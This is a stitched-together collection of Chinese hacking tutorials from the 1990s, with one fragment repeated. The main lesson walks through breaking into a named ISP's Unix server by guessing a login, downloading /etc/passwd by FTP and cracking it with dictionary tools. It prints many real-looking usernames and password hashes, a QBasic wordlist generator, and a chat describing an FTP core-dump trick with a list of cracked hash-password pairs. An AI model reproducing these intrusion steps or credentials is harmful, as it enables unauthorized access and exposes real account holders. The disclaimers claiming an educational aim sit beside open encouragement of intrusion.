由於本次所作的课程内容以实作为主, 除了本人IP 有所更改, 一切都使用本人所用之Telnet 软体Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内容, 否则本人概不负责!(连线到某一主机之後.... 此处的.tw 是假的Domain name).tw> telnet Trying 203.66.169.11...Connected to .Escape character is '^]'.Password: (随便按一下Enter)Login incorrectwww login: coffee (以Hacker 的敏锐判断username=coffee password=coffee)Password:Last login: Thu Jan 9 10:41:52 from .tw欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!================================================================= (直接进入核心部份)www:~$ cd /etcwww:/etc$ lsDIR_COLORS hosts.equiv printcapHOSTNAME hosts.lpd profile NETWORKING inet@ protocolsNNTP_INEWS_DOMAIN inetd.conf psdevtabX11@ inittab rc.d/at.deny inittab.gettyps.sample resolv.confbootptab ioctl.save rpccsh.cshrc issue securettycsh.login securetty.olddefault/ klogd.pid sendmail.cfdiphosts ld.so.cache sendmail.stexports ld.so.conf servicesfastboot lilo/ shellsfdprm lilo.conf shutdownpidfs/ localtime skel/fstab magic slip.hostsftp.banner mail.rc slip.loginftp.deny motd snooptabftpaccess motd.bak sudoersftpconversions msgs/ syslog.confftpgroups mtab syslog.pidftpusers mtools termcapgateways named.boot ttysgettydefs networks utmp@group nntpserver vga/host.conf passwd wtmp@hosts passwd.OLD yp.conf.example hosts.allow passwd.oldhosts.deny ppp/(看看我们的目标长得如何???)www:/etc$ cat passwdroot:abcdefghijklmn:0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/usr/lib/news:uucp:*:10:14:uucp:/var/spool/uucppublic:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashnobody:*:-1:100:nobody:/dev/null:ftp:*:404:1::/home/ftp:/bin/bashguest:*:405:100:guest:/dev/null:/dev/nullshan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bashfax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bashtham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bashccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bashsk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bashservices:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bashrichard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bashlilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bashsupport:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bashstonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/cshbear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bashlance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bashcaves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bashsales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bashkingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bashrecycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bashrecycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bashrecycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bashhxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bashgoodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bashrwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bashcharliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bashslb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bashs6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bashlsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bashlilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bashnalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bashtoonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bashyahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bashbasic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bashwunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bashkaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bas hfan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash(CoolFire 注: 因为使用PaSs2DiC 很容易找出ID 与Password 相同的. 故除了Coffee 外, 其它我找到密码的EnCode Password 部份皆改过..... 除非你一个一个试啦~~~ 我没说喔!)www:/etc$ exitlogoutConnection closed by foreign host.(可以走了!! 改用FTP 将/etc/passwd 给抓回来吧!).tw> ftp Connected to .220-220- 欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!220-220-220- There are 0 users in FTP Server now.220- 目前已有0 使用者在此Server 上.220- If you have any suggestion, please mail to:220- service@xx.xxxxxxx.xxx.xx.220-220-220-220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.(还是使用刚刚的帐号进入)Name (:YourName): coffee331 Password required for coffee.Password:230 User coffee logged in.Remote system type is UNIX.Using binary mode to transfer files.(直接到达档案放置地点)ftp> cd /etc250 CWD command successful.ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.ttysfdprmgroupissuemotdmtoolsprofilesecurettyshellstermcapskelcsh.cshrccsh.loginlilo。
最简单的黑客入门教程大全
最简单的黑客入门教程大全目录1 黑客简介 (2)2 保护自己电脑绝对不做黑客肉鸡 (2)3 抓肉鸡的几种方法 (5)4 防止黑客通过Explorer侵入系统 (9)5 SQL注入详解 (10)5.1 注入工具 (11)5.2 php+Mysql注入的误区 (11)5.3 简单的例子 (12)5.4 语句构造 (14)5.5 高级应用 (21)5.6 实例 (26)5.7 注入的防范 (28)5.8 我看暴库漏洞原理及规律1 (29)5.9 我看暴库漏洞原理及规律2 (31)6 跨站脚本攻击 (33)6.1 跨站脚本工具 (33)6.2 什么是XSS攻击 (34)6.3 如何寻找XSS漏洞 (34)6.4 寻找跨站漏洞 (35)6.5 如何利用 (35)6.6 XSS与其它技术的结合 (36)7 XPath注入 (37)7.1 XPath注入介绍 (37)7.2 XPath注入工具 (40)声明:文章来源大多是网上收集而来,版权归其原作者所有。
1黑客简介"黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。
关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。
但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。
有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。
他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。
而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。
CoolHC Volume 3 By CoolFire
CoolHC V olume 3 By CoolFire这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!前几次说到了Net Coffee 店, 还好他们没有提供客户拨接上线的功能,不然密码或是帐号被人盗用的客户不就糗大了! 但是CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的W3 密码,误入一个号称第一个提供网路拨接的ISP, 且在CoolFire 顺利的抓回/etc/passwd之後, 使用了自己写的PaSs2DiC + CJack 来解出密码, 没想到不用1 分钟, 就找出了9 组ID 与Password 相同的密码,勿怪我没有在这里提醒大家, 还好我没有找到root password, 不然可能该系统就此停摆, 不可再见天日也! (当然我不可能这麽作啦!).看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上CoolFire最近开会的时候遇到的情况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强,可能到时候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业崩溃!大家要小心呀! ISP 是一般User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导User 正确的网路使用观念(Password 的设定及proxy 的使用等),实在不敢想像这样的网路发展到几年後会是甚麽样子??这一次的说明还是没有谈到新的技巧, 在James将首页更新後各位应该已经可以从中学到许多东西了, 如果想要学习入侵, 就一定要知道最新的资讯(入侵本国的网路则不用,反正没人重视网路安全..... 真失望), 在别人还没将Bug 修正之前就抢先一步拿到/etc/passwd,所以订阅一些网路安全的Mail List 是必要的, 多看一些网安有关的News Group 也是必要的(不仅Hacker如此, ISP 更要多注意这些资讯!). 日後有空再整里一些Mail List 给大家!!本次主题: 说明如何连接该ISP 并且对其/etc/passwd 解码,连接位址: (203.66.169.11)特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以CoolFire 已经Mail给该网页之维护人员更改密码, 但该网页之ISP 仍为新手之练习好题材! CoolFireMail 给该网页维护人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了!Mail sent to dhacme@:Subject: 请速更动网页密码From: CoolFire <coolfires@>你的网页作得不错, 但是因为你所设定的密码太容易为骇客所入侵, 请於见到此信後速速更改你的网页进入密码, 否则下次若网页遭到篡改, 本人概不负责!!**** 课程开始****请注意: 由於本次所作的课程内容以实作为主, 除了本人IP 有所更改,一切都使用本人所用之Telnet 软体Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内容,否则本人概不负责!(连线到某一主机之後.... 此处的.tw 是假的Domain name).tw> telnet Trying 203.66.169.11...Connected to .Escape character is '^]'.Password: (随便按一下Enter)Login incorrectwww login: coffee (以Hacker 的敏锐判断username=coffee password=coffee) Password:Last login: Thu Jan 9 10:41:52 from .tw欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!============================================================= ====(直接进入核心部份)www:~$ cd /etcwww:/etc$ lsDIR_COLORS hosts.equiv printcapHOSTNAME hosts.lpd profileNETWORKING inet@ protocolsNNTP_INEWS_DOMAIN inetd.conf psdevtabX11@ inittab rc.d/at.deny inittab.gettyps.sample resolv.confbootptab ioctl.save rpccsh.cshrc issue securettycsh.login securetty.olddefault/ klogd.pid sendmail.cfdiphosts ld.so.cache sendmail.stexports ld.so.conf servicesfastboot lilo/ shellsfdprm lilo.conf shutdownpidfs/ localtime skel/fstab magic slip.hostsftp.banner mail.rc slip.loginftp.deny motd snooptabftpaccess motd.bak sudoersftpconversions msgs/ syslog.confftpgroups mtab syslog.pidftpusers mtools termcapgateways named.boot ttysgettydefs networks utmp@group nntpserver vga/host.conf passwd wtmp@hosts passwd.OLD yp.conf.examplehosts.allow passwd.oldhosts.deny ppp/(看看我们的目标长得如何???)www:/etc$ cat passwdroot:abcdefghijklmn:0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/usr/lib/news:uucp:*:10:14:uucp:/var/spool/uucppublic:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashnobody:*:-1:100:nobody:/dev/null:ftp:*:404:1::/home/ftp:/bin/bashguest:*:405:100:guest:/dev/null:/dev/nullshan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bashfax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bashtham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bashsk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bashservices:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bashsupport:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/cshbear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bashlance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcshtaiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bashcaves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bashsales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bashkingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bashrecycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bashrecycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bashrecycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bashhxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bashgoodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bashrwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bashcharliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bashtkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bashslb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bashs6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bashlsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bashlilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bashnalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bashtoonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bashyahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bashbasic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bashwunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash(CoolFire 注: 因为使用PaSs2DiC 很容易找出ID 与Password 相同的. 故除了Coffee外, 其它我找到密码的EnCode Password 部份皆改过..... 除非你一个一个试啦~~~ 我没说喔!)www:/etc$ exitlogoutConnection closed by foreign host.(可以走了!! 改用FTP 将/etc/passwd 给抓回来吧!).tw> ftp Connected to .220-220- 欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!220-220-220- There are 0 users in FTP Server now.220- 目前已有0 使用者在此Server 上.220- If you have any suggestion, please mail to:220- service@xx.xxxxxxx.xxx.xx.220-220-220-220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. (还是使用刚刚的帐号进入)Name (:YourName): coffee331 Password required for coffee.Password:230 User coffee logged in.Remote system type is UNIX.Using binary mode to transfer files.(直接到达档案放置地点)ftp> cd /etc250 CWD command successful.ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.ttysfdprmgroupissuemotdmtoolsprofilesecurettyshellstermcapskelcsh.cshrccsh.loginliloinetdefaultservicesHOSTNAMEDIR_COLORSpasswdpasswd.OLDwtmputmpgettydefsinittab.gettyps.sample ld.so.confld.so.cacheat.denyfsmagicrc.dsyslog.confprintcapinittabsudoersvgadiphostsmail.rcpppNNTP_INEWS_DOMAIN sendmail.st NETWORKING gatewaysbootptabexportsftpusershost.confhostshosts.allowhosts.denyhosts.equivinetd.confnamed.bootnetworksnntpserverprotocolsresolv.confrpcftpaccesshosts.lpd ftpconversionssnooptabmsgsftpgroupsslip.loginslip.hostsyp.conf.exampleX11lilo.confsendmail.cffstabfastbootmtabsyslog.pidklogd.pidshutdownpidlocaltimepasswd.oldioctl.savepsdevtabftp.bannerftp.denymotd.baksecuretty.old226 Transfer complete.(取回该档案)ftp> get passwd200 PORT command successful.150 Opening BINARY mode data connection for passwd (4081 bytes).226 Transfer complete.4081 bytes received in 2.5 seconds (1.6 Kbytes/s)(尽速离开)ftp> bye221 Goodbye.好了! 有了/etc/passwd 之後一切都好办了, 赶紧将你的宝贝收藏PaSs2DiC 拿出来吧!!快点跑一下, 让它自动产生字典档案:C:\hack>pass2dicPaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN. This tool will:[1] Load PASSWD file and convert it to only username text file[2] Write the file to a dictionary file you choise for targetYour Source PASSWD File Name: passwdYour Target Dictionary Name: dic.cfePaSs2DiC Author: James Lin E-Mail: fetag@FETAG Software Development Co: /~fetagC:\hack>(这样就好了! 自动产生的档案会放在dic.cfe 这个档案中, 咱们跑一下Brute Force看看!)C:\hack>fbrute passwd @dic.cfeBRUTE!, Unix Brute Force Hacking Routine. v2.0Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐Attempts/Hits: 5184/9Taking list input from dic.cfeBeginning search of passwd for password: xxxMatch for password xxxxxx found! Username: xxxxxxMatch for password xxxxx found! Username: xxxxxMatch for password xxx found! Username: xxxMatch for password xxxxxx found! Username: xxxxxxMatch for password xxxxxx found! Username: xxxxxxMatch for password coffee found! Username: coffeeMatch for password xxxxxxx found! Username: xxxxxxxMatch for password xxx found! Username: xxxMatch for password xxxx found! Username: xxxxDone.C:\hack>看! 除了coffee 外还是有许多人使用与ID 相同的字作为密码, 实在是....@#$%^...&*因某些关系所以其它部份要被"马赛克" 起来, 请各位读者见量!**** 再谈密码****看了以上的破解示范, 就可以了解到许多人还是对於"密码" 这东西不是很有"密码"的观念, 人就是那麽的懒, 随便设定一个好记的, 但是这种密码确是最不安全的, 上次我们谈到如何用QBasic 来设计一个自动产生密码的小程式, 相信对许多人有很大的帮助,底下我们再来浅显的介绍一下字母密码的产生方法, 相信对於你在Hack 某站会有更大的帮助.事情的开始是有一位网友mail 给我, 问我字典档要如何写程式来"自动扩大",而让我有了写这一段的想法, 现在我就针对这位网友的问题作一个更详细的说明(因已简短回信答覆),并且写出来让大家了解一下, 当然我们的示范还是使用QBasic, 因为这是最容易找到的程式了,而且语法大家也可能会比较熟悉一点, 如果我使用VB 或 C 来写, 可能有些人只会拿去用,而不会去修改或者写个好一点的出来!先说明一下原理好了: 我们所要作的程式是一个自动产生字典档的程式,所以我们要了解字的字母排列到底有哪些方法可循?? 我们先举几个简单的单字出来比较看看:[1] apple [2] guest [3] james [4] superman [5] passwordOK! 来看看! 如果你有一点英文的概念的话应该会知道母音及子音吧!我们首先这样说明: 母音在英文上有: A E I O U 这五个, 所有的英文单字都会有这些母音(有些没有的可能是专有名词或缩写), 也有可能是双母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等,再来就是比较每个字的开头, 有可能是母音,也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student是两个子音再接一个母音字母, 所以接下来依照常用字将这些子音找出来, 我想了一下大概有: br, bl, cl, dg, dr, fl, gr, kn, ph, st, sp, wh .... 等几种(其它请自行统计), 然後是结尾部份, 通常结尾部分有下列几种: e; est; ord; ard; ls; es; s...等好多好多, 我们稍为思考一下就知道要如何写出这样的程式出来了!!我大略写一个简单的, 其它大家自行发挥, 如果有人学语言学的, 请帮忙弄一份常用组合表出来, 可能会更有帮助吧!!底下就是该程式片段, 执行後会产生MyDic.Txt 档, 大小为: 22,096 Bytes 共有3120个字的字典!!--------------- MakeDic.BAS Start Here---------------------------------------------------------------------------------------DIM FirstWord$(20)DIM MotherWord$(13)DIM LastWord$(12)DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s","t", "p", "k" , "f", "m", "n", "b","k"DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"FOR I = 1 TO 20READ FirstWord$(I)PRINT FirstWord$(I)NEXT IFOR I = 1 TO 13READ MotherWord$(I)NEXT IFOR I = 1 TO 12READ LastWord$(I)NEXT IOPEN "MyDic.txt" FOR OUTPUT AS #1FOR I = 1 TO 20FOR J = 1 TO 13FOR K = 1 TO 12PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)NEXT KNEXT JNEXT ICLOSE : END--------------- Cut Here, End of MakeDic.BAS--------------------------------------------------------------------------------当然这只是小部份的组合, 相信你可以作出一个更大的字典档出来, 如:子音+母音+子音+母音+子音, 作出来的字典档会很吓人喔!! 这一个部份就讲到这里了! 如果你有很棒的字典产生程式,写好了请Mail 一份给我喔!! 如果可以的话请说明是否可以公布在我的W3 上让其它人下载!!还是你只是要给我?!希望每次讲到密码的问题後, 大家可以将这些密码的产生方法与自己的密码对照看看,如果有相同的请赶紧将自己的密码换掉, 我讲得口沫横飞, 都没有人要听吗??? 咖啡业者...... ISP们.... 教教你们的使用者吧..... 唉~~~~**** 後语****我们的首页感谢大家的支持, 现在人数已经到达2,000 了, 这是一个地下站(未对外正式公布) 很棒的一个数字, 在与其它工作室人员研究之後, 暂时不对外公布站址, 如果你是"误闯"到本站来的! 我们欢迎你的加入, 但目前尚不考虑对外公布站址, 请您在告诉你的朋友有这麽一个站存在的时候,请他不要随便告诉别人(请只告诉你信赖的朋友; 或对电脑有一份特别狂热的人, 我们都欢迎他们的加入),我们目前所采用的方式将是开放式的! 对首页部份暂时不以密码方式处理.** 不要Crack 这个首页的ISP!!!! 否则FETAG Sofeware's Hacking Page将会完全关闭, 再也不寻找其它的地方来放置, 希望给你的是使用电脑的"知识", 不要利用它来夺取任何的"权利",本首页著重的是教育, 而不是一个的教导攻击的方法, 希望大家对於政府机关(org.tw) 或教育机构(edu.tw)不要作任何的破坏!! 还有我的ISP......:D------哇! 一份案子搞了好久, 都没时间维护网页了, 所以特别将维护的工作还给了James,希望大家多多支持我们的园地, 我案子搞完後再跟大家谈谈我最近的实战故事! 虽然没时间写网页,但是还是会写一些文件给大家作为参考!!------再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上(又...如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它Shut Down.... 好了! 别太暴力了!。
yuxin的黑客入门
Y: 你说的这些漏洞,到底是什么漏洞!没有说清楚怎么利用这些漏洞
i: phf漏洞在coolfir和THX教程中都讲过了,即www.hacker.me/cgi-bin/phf?....哪一部分.B.tp漏洞在其他文章也很多,即:1.ftp上主机,用一个合法用户的登陆(匿名不行)2.cd /tmp或用户目录er root4.root requir passwd:XXXXX (随便输几个字符)5.提示connect close by remot machine.6.重新fpt登陆后,cd /tmp;看到core文件就好了:)7.get core ---里面有shadow的片断,用edit删去无用的内容就可以用john 跑了.一般ftp提示UNIX(V) system 的主机都可用此法C.win95/nt下一般可用fontpage或nutbui..的漏洞,自己找资料看看,我一时没找到.
下篇
iamin: 你好!很感谢你给我回信,我没有给你吃什么糖衣炮弹,我只是说说我想说的!对了上上次你给我的PASSWD和SHADOW我试着JOHN破了一 下!你看看这些是我们大家都需要的真正的密码(不是SHOW过的): 6VG.amxoiWm6A:11 fdkVARBHm05VU:88888888 yXfsMS5dJUwbg:LEE zN88EuBr.oCJw:YNSZF a19LYYMRIEQ2A:KYJW t1Tb0nnMm8mL2:HHZX 92hjNOWOwRX9s:YXJW AmipTt7Mc.j9k:oakland i9GDAwGfRuKcQ:kmbwzx o3F3QNeJtID/g:tips 4G8p2S59mZq36:TJG mdBHk/vuaMfEc:sxj 4nmA0M3eMD8AE:lwh wdXINZH83Ss8k:njzxxzx HeWB4TYZhL2qs:dlzxxzx LljHx2OToJm/g:test HhiFXJTtf5KYw:jwnjc LvAEzLDKCyTnQ:dhzxxzx GHUPKbrfHOgwA:ynmyt auDa1aGa6j1yA:smjw DnFYlA1zLPE8A:oakland vSHp9hQOh3.T2:wsjw eOfgJae0l1zaA:wzb SPgzbeQrgmy/2:lrj hefd6TV7m8yDk:bsdjxxzx eyhgReGBBboKg:morris12 ofR.RfNeM25TM:fgk97 g4B3RkHrrJw9g:hyb123 ONIeS8c4h89B.:www123 --------------------------------------------------------- 破解是正确的,但…我再说明一次吧… lwh:x:109:1:SE Engineer:/home/lwh:/usr/bin/sh | | | | | | |--用户的shell为 sh | | | | | |-----用户目录 | | | | |---用户全名或其他情况 | | | |----用户组id号 | | |----用户id号 | |--代表密码被shadow,加密后的密码自动在shadow文件中匹配. |------用户账号 shadow中对应用户lwh的记录: lwh:4nmA0M3eMD8AE:9973:0:168:7::10956: | |---用DES方法加密后生成的13位加密码.(即对原密码lwh加密后的结果) |---于passwd文件对应的账号lwh. 破解完后,用命令 john -show aaa 可以看到用户名和密码的对应关系,john的说明中都写了的! 因此你可以知道 